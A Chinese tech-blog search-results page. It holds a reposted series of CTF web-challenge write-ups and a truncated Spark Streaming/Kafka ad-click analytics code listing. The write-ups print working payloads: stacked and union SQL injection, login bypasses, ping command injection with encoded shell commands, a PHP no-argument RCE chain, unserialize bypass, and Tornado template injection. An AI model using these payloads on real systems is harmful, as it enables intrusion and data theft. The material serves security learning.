前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[HTML文档中CSS选择器与JavaSc...]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
转载文章
...SQL的预处理语句,使用 : concat('s','elect',' from 1919810931114514') 完成绕过 构造pyload: 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字,字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说,没有回显,联合查询基本没戏。 好在页面会进行相应的变化,证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select from products where productid=1;DELETE FROM products当执行查询后,第一条显示查询信息,第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回,一种是空白,一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母(除过滤的关键词外)都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符,不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接,但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接,而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候,mysql也可以把 || 作为字符串拼接。 修改完后,|| 就会被认为是字符串拼接符 MySQL中sql_mode参数,具体的看这里 解题思路1: payload:,1 查询语句:select ,1||flag from Flag 解题思路2: 堆叠注入,使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析: 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入:1’ 为'闭合 2.看字段:1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ,太像了,增加了过滤规则。 修改表名和set均不可用,所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据,也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了:cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点: cve-2020-7066利用 老套路:先F12查看源码 发现提示:Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾,这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点: .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素,并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节,看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢?<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");} }else{die("再好好想想!");} }else{die("还想读flag,臭弟弟!");} }// highlight_file(__FILE__);?> 既然getshell基本不可能,那么考虑读源码 看源码,flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件,例如: <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数: localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点: current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步:读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下,利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数,此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由,就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的,参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的,名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象,hexdigest()是获得加密后的16进制字符串 urllib.unquote() 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog,且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了:secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为:fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入: /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目: 1.tornado是一个python的模板,可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息,想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞,尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入: 查字段:1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表: [GXYCTF2019]Ping Ping Ping 考察:RCE的防护绕过 直接构造:?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格,使用拼接变量来拼接出Flag字符串: 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么:?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥,flag字眼也过滤了,bash也没了,不过sh没过滤: 继续构造payload: ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码,得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass,具体看这里 HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1.删除空白符2.将某些字符转换为下划线(包括空格) scandir():列出参数目录中的文件和目录 发现/被过滤了 ,可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload: 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典,要带路径 -r 递归跑(查到一个目录后,重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道,如果password=100,username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时,属性个数的值大于实际属性个数时,就可以 2.private修饰符的问题 private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover, 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法: flask session 伪造 具体,看这里 flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显: 1' uniunionon selselectect 1,2,3 over!正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接:https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-11-13 21:30:33
303
转载
转载文章
...分析,屏蔽IP等; 使用updateStateByKey或者mapWithState进行不同地区广告点击排名的计算; Spark Streaming+Spark SQL+Spark Core等综合分析数据; 使用Window类型的操作; 高可用和性能调优等等; 流量趋势,一般会结合DB等; Spark Core / /package com.tom.spark.SparkApps.sparkstreaming;import java.util.Date;import java.util.HashMap;import java.util.Map;import java.util.Properties;import java.util.Random;import kafka.javaapi.producer.Producer;import kafka.producer.KeyedMessage;import kafka.producer.ProducerConfig;/ 数据生成代码,Kafka Producer产生数据/public class MockAdClickedStat {/ @param args/public static void main(String[] args) {final Random random = new Random();final String[] provinces = new String[]{"Guangdong", "Zhejiang", "Jiangsu", "Fujian"};final Map<String, String[]> cities = new HashMap<String, String[]>();cities.put("Guangdong", new String[]{"Guangzhou", "Shenzhen", "Dongguan"});cities.put("Zhejiang", new String[]{"Hangzhou", "Wenzhou", "Ningbo"});cities.put("Jiangsu", new String[]{"Nanjing", "Suzhou", "Wuxi"});cities.put("Fujian", new String[]{"Fuzhou", "Xiamen", "Sanming"});final String[] ips = new String[] {"192.168.112.240","192.168.112.239","192.168.112.245","192.168.112.246","192.168.112.247","192.168.112.248","192.168.112.249","192.168.112.250","192.168.112.251","192.168.112.252","192.168.112.253","192.168.112.254",};/ Kafka相关的基本配置信息/Properties kafkaConf = new Properties();kafkaConf.put("serializer.class", "kafka.serializer.StringEncoder");kafkaConf.put("metadeta.broker.list", "Master:9092,Worker1:9092,Worker2:9092");ProducerConfig producerConfig = new ProducerConfig(kafkaConf);final Producer<Integer, String> producer = new Producer<Integer, String>(producerConfig);new Thread(new Runnable() {public void run() {while(true) {//在线处理广告点击流的基本数据格式:timestamp、ip、userID、adID、province、cityLong timestamp = new Date().getTime();String ip = ips[random.nextInt(12)]; //可以采用网络上免费提供的ip库int userID = random.nextInt(10000);int adID = random.nextInt(100);String province = provinces[random.nextInt(4)];String city = cities.get(province)[random.nextInt(3)];String clickedAd = timestamp + "\t" + ip + "\t" + userID + "\t" + adID + "\t" + province + "\t" + city;producer.send(new KeyedMessage<Integer, String>("AdClicked", clickedAd));try {Thread.sleep(50);} catch (InterruptedException e) {// TODO Auto-generated catch blocke.printStackTrace();} }} }).start();} } package com.tom.spark.SparkApps.sparkstreaming;import java.sql.Connection;import java.sql.DriverManager;import java.sql.PreparedStatement;import java.sql.ResultSet;import java.sql.SQLException;import java.util.ArrayList;import java.util.Arrays;import java.util.HashMap;import java.util.HashSet;import java.util.Iterator;import java.util.List;import java.util.Map;import java.util.Set;import java.util.concurrent.LinkedBlockingQueue;import kafka.serializer.StringDecoder;import org.apache.spark.SparkConf;import org.apache.spark.api.java.JavaPairRDD;import org.apache.spark.api.java.JavaRDD;import org.apache.spark.api.java.JavaSparkContext;import org.apache.spark.api.java.function.Function;import org.apache.spark.api.java.function.Function2;import org.apache.spark.api.java.function.PairFunction;import org.apache.spark.api.java.function.VoidFunction;import org.apache.spark.sql.DataFrame;import org.apache.spark.sql.Row;import org.apache.spark.sql.RowFactory;import org.apache.spark.sql.hive.HiveContext;import org.apache.spark.sql.types.DataTypes;import org.apache.spark.sql.types.StructType;import org.apache.spark.streaming.Durations;import org.apache.spark.streaming.api.java.JavaDStream;import org.apache.spark.streaming.api.java.JavaPairDStream;import org.apache.spark.streaming.api.java.JavaPairInputDStream;import org.apache.spark.streaming.api.java.JavaStreamingContext;import org.apache.spark.streaming.api.java.JavaStreamingContextFactory;import org.apache.spark.streaming.kafka.KafkaUtils;import com.google.common.base.Optional;import scala.Tuple2;/ 数据处理,Kafka消费者/public class AdClickedStreamingStats {/ @param args/public static void main(String[] args) {// TODO Auto-generated method stub//好处:1、checkpoint 2、工厂final SparkConf conf = new SparkConf().setAppName("SparkStreamingOnKafkaDirect").setMaster("hdfs://Master:7077/");final String checkpointDirectory = "hdfs://Master:9000/library/SparkStreaming/CheckPoint_Data";JavaStreamingContextFactory factory = new JavaStreamingContextFactory() {public JavaStreamingContext create() {// TODO Auto-generated method stubreturn createContext(checkpointDirectory, conf);} };/ 可以从失败中恢复Driver,不过还需要指定Driver这个进程运行在Cluster,并且在提交应用程序的时候制定--supervise;/JavaStreamingContext javassc = JavaStreamingContext.getOrCreate(checkpointDirectory, factory);/ 第三步:创建Spark Streaming输入数据来源input Stream: 1、数据输入来源可以基于File、HDFS、Flume、Kafka、Socket等 2、在这里我们指定数据来源于网络Socket端口,Spark Streaming连接上该端口并在运行的时候一直监听该端口的数据 (当然该端口服务首先必须存在),并且在后续会根据业务需要不断有数据产生(当然对于Spark Streaming 应用程序的运行而言,有无数据其处理流程都是一样的) 3、如果经常在每间隔5秒钟没有数据的话不断启动空的Job其实会造成调度资源的浪费,因为并没有数据需要发生计算;所以 实际的企业级生成环境的代码在具体提交Job前会判断是否有数据,如果没有的话就不再提交Job;///创建Kafka元数据来让Spark Streaming这个Kafka Consumer利用Map<String, String> kafkaParameters = new HashMap<String, String>();kafkaParameters.put("metadata.broker.list", "Master:9092,Worker1:9092,Worker2:9092");Set<String> topics = new HashSet<String>();topics.add("SparkStreamingDirected");JavaPairInputDStream<String, String> adClickedStreaming = KafkaUtils.createDirectStream(javassc, String.class, String.class, StringDecoder.class, StringDecoder.class,kafkaParameters, topics);/因为要对黑名单进行过滤,而数据是在RDD中的,所以必然使用transform这个函数; 但是在这里我们必须使用transformToPair,原因是读取进来的Kafka的数据是Pair<String,String>类型, 另一个原因是过滤后的数据要进行进一步处理,所以必须是读进的Kafka数据的原始类型 在此再次说明,每个Batch Duration中实际上讲输入的数据就是被一个且仅被一个RDD封装的,你可以有多个 InputDStream,但其实在产生job的时候,这些不同的InputDStream在Batch Duration中就相当于Spark基于HDFS 数据操作的不同文件来源而已罢了。/JavaPairDStream<String, String> filteredadClickedStreaming = adClickedStreaming.transformToPair(new Function<JavaPairRDD<String,String>, JavaPairRDD<String,String>>() {public JavaPairRDD<String, String> call(JavaPairRDD<String, String> rdd) throws Exception {/ 在线黑名单过滤思路步骤: 1、从数据库中获取黑名单转换成RDD,即新的RDD实例封装黑名单数据; 2、然后把代表黑名单的RDD的实例和Batch Duration产生的RDD进行Join操作, 准确的说是进行leftOuterJoin操作,也就是说使用Batch Duration产生的RDD和代表黑名单的RDD实例进行 leftOuterJoin操作,如果两者都有内容的话,就会是true,否则的话就是false 我们要留下的是leftOuterJoin结果为false; /final List<String> blackListNames = new ArrayList<String>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();jdbcWrapper.doQuery("SELECT FROM blacklisttable", null, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {while(result.next()){blackListNames.add(result.getString(1));} }});List<Tuple2<String, Boolean>> blackListTuple = new ArrayList<Tuple2<String,Boolean>>();for(String name : blackListNames) {blackListTuple.add(new Tuple2<String, Boolean>(name, true));}List<Tuple2<String, Boolean>> blacklistFromListDB = blackListTuple; //数据来自于查询的黑名单表并且映射成为<String, Boolean>JavaSparkContext jsc = new JavaSparkContext(rdd.context());/ 黑名单的表中只有userID,但是如果要进行join操作的话就必须是Key-Value,所以在这里我们需要 基于数据表中的数据产生Key-Value类型的数据集合/JavaPairRDD<String, Boolean> blackListRDD = jsc.parallelizePairs(blacklistFromListDB);/ 进行操作的时候肯定是基于userID进行join,所以必须把传入的rdd进行mapToPair操作转化成为符合格式的RDD/JavaPairRDD<String, Tuple2<String, String>> rdd2Pair = rdd.mapToPair(new PairFunction<Tuple2<String,String>, String, Tuple2<String, String>>() {public Tuple2<String, Tuple2<String, String>> call(Tuple2<String, String> t) throws Exception {// TODO Auto-generated method stubString userID = t._2.split("\t")[2];return new Tuple2<String, Tuple2<String,String>>(userID, t);} });JavaPairRDD<String, Tuple2<Tuple2<String, String>, Optional<Boolean>>> joined = rdd2Pair.leftOuterJoin(blackListRDD);JavaPairRDD<String, String> result = joined.filter(new Function<Tuple2<String,Tuple2<Tuple2<String,String>,Optional<Boolean>>>, Boolean>() {public Boolean call(Tuple2<String, Tuple2<Tuple2<String, String>, Optional<Boolean>>> tuple)throws Exception {// TODO Auto-generated method stubOptional<Boolean> optional = tuple._2._2;if(optional.isPresent() && optional.get()){return false;} else {return true;} }}).mapToPair(new PairFunction<Tuple2<String,Tuple2<Tuple2<String,String>,Optional<Boolean>>>, String, String>() {public Tuple2<String, String> call(Tuple2<String, Tuple2<Tuple2<String, String>, Optional<Boolean>>> t)throws Exception {// TODO Auto-generated method stubreturn t._2._1;} });return result;} });//广告点击的基本数据格式:timestamp、ip、userID、adID、province、cityJavaPairDStream<String, Long> pairs = filteredadClickedStreaming.mapToPair(new PairFunction<Tuple2<String,String>, String, Long>() {public Tuple2<String, Long> call(Tuple2<String, String> t) throws Exception {String[] splited=t._2.split("\t");String timestamp = splited[0]; //YYYY-MM-DDString ip = splited[1];String userID = splited[2];String adID = splited[3];String province = splited[4];String city = splited[5]; String clickedRecord = timestamp + "_" +ip + "_"+userID+"_"+adID+"_"+province +"_"+city;return new Tuple2<String, Long>(clickedRecord, 1L);} });/ 第4.3步:在单词实例计数为1基础上,统计每个单词在文件中出现的总次数/JavaPairDStream<String, Long> adClickedUsers= pairs.reduceByKey(new Function2<Long, Long, Long>() {public Long call(Long i1, Long i2) throws Exception{return i1 + i2;} });/判断有效的点击,复杂化的采用机器学习训练模型进行在线过滤 简单的根据ip判断1天不超过100次;也可以通过一个batch duration的点击次数判断是否非法广告点击,通过一个batch来判断是不完整的,还需要一天的数据也可以每一个小时来判断。/JavaPairDStream<String, Long> filterClickedBatch = adClickedUsers.filter(new Function<Tuple2<String,Long>, Boolean>() {public Boolean call(Tuple2<String, Long> v1) throws Exception {if (1 < v1._2){//更新一些黑名单的数据库表return false;} else { return true;} }});//filterClickedBatch.print();//写入数据库filterClickedBatch.foreachRDD(new Function<JavaPairRDD<String,Long>, Void>() {public Void call(JavaPairRDD<String, Long> rdd) throws Exception {rdd.foreachPartition(new VoidFunction<Iterator<Tuple2<String,Long>>>() {public void call(Iterator<Tuple2<String, Long>> partition) throws Exception {//使用数据库连接池的高效读写数据库的方式将数据写入数据库mysql//例如一次插入 1000条 records,使用insertBatch 或 updateBatch//插入的用户数据信息:userID,adID,clickedCount,time//这里面有一个问题,可能出现两条记录的key是一样的,此时需要更新累加操作List<UserAdClicked> userAdClickedList = new ArrayList<UserAdClicked>();while(partition.hasNext()) {Tuple2<String, Long> record = partition.next();String[] splited = record._1.split("\t");UserAdClicked userClicked = new UserAdClicked();userClicked.setTimestamp(splited[0]);userClicked.setIp(splited[1]);userClicked.setUserID(splited[2]);userClicked.setAdID(splited[3]);userClicked.setProvince(splited[4]);userClicked.setCity(splited[5]);userAdClickedList.add(userClicked);}final List<UserAdClicked> inserting = new ArrayList<UserAdClicked>();final List<UserAdClicked> updating = new ArrayList<UserAdClicked>();JDBCWrapper jdbcWrapper = JDBCWrapper.getJDBCInstance();//表的字段timestamp、ip、userID、adID、province、city、clickedCountfor(final UserAdClicked clicked : userAdClickedList) {jdbcWrapper.doQuery("SELECT clickedCount FROM adclicked WHERE"+ " timestamp =? AND userID = ? AND adID = ?",new Object[]{clicked.getTimestamp(), clicked.getUserID(),clicked.getAdID()}, new ExecuteCallBack() {public void resultCallBack(ResultSet result) throws Exception {// TODO Auto-generated method stubif(result.next()) {long count = result.getLong(1);clicked.setClickedCount(count);updating.add(clicked);} else {inserting.add(clicked);clicked.setClickedCount(1L);} }});}//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> insertParametersList = new ArrayList<Object[]>();for(UserAdClicked insertRecord : inserting) {insertParametersList.add(new Object[] {insertRecord.getTimestamp(),insertRecord.getIp(),insertRecord.getUserID(),insertRecord.getAdID(),insertRecord.getProvince(),insertRecord.getCity(),insertRecord.getClickedCount()});}jdbcWrapper.doBatch("INSERT INTO adclicked VALUES(?, ?, ?, ?, ?, ?, ?)", insertParametersList);//表的字段timestamp、ip、userID、adID、province、city、clickedCountList<Object[]> updateParametersList = new ArrayList<Object[]>();for(UserAdClicked updateRecord : updating) {updateParametersList.add(new Object[] {updateRecord.getTimestamp(),updateRecord.getIp(),updateRecord.getUserID(),updateRecord.getAdID(),updateRecord.getProvince(),updateRecord.getCity(),updateRecord.getClickedCount() + 1});}jdbcWrapper.doBatch("UPDATE adclicked SET clickedCount = ? WHERE"+ " timestamp =? AND ip = ? AND userID = ? AND adID = ? "+ "AND province = ? AND city = ?", updateParametersList);} });return null;} });//再次过滤,从数据库中读取数据过滤黑名单JavaPairDStream<String, Long> blackListBasedOnHistory = filterClickedBatch.filter(new Function<Tuple2<String,Long>, Boolean>() {public Boolean call(Tuple2<String, Long> v1) throws Exception {//广告点击的基本数据格式:timestamp,ip,userID,adID,province,cityString[] splited = v1._1.split("\t"); //提取key值String date =splited[0];String userID =splited[2];String adID =splited[3];//查询一下数据库同一个用户同一个广告id点击量超过50次列入黑名单//接下来 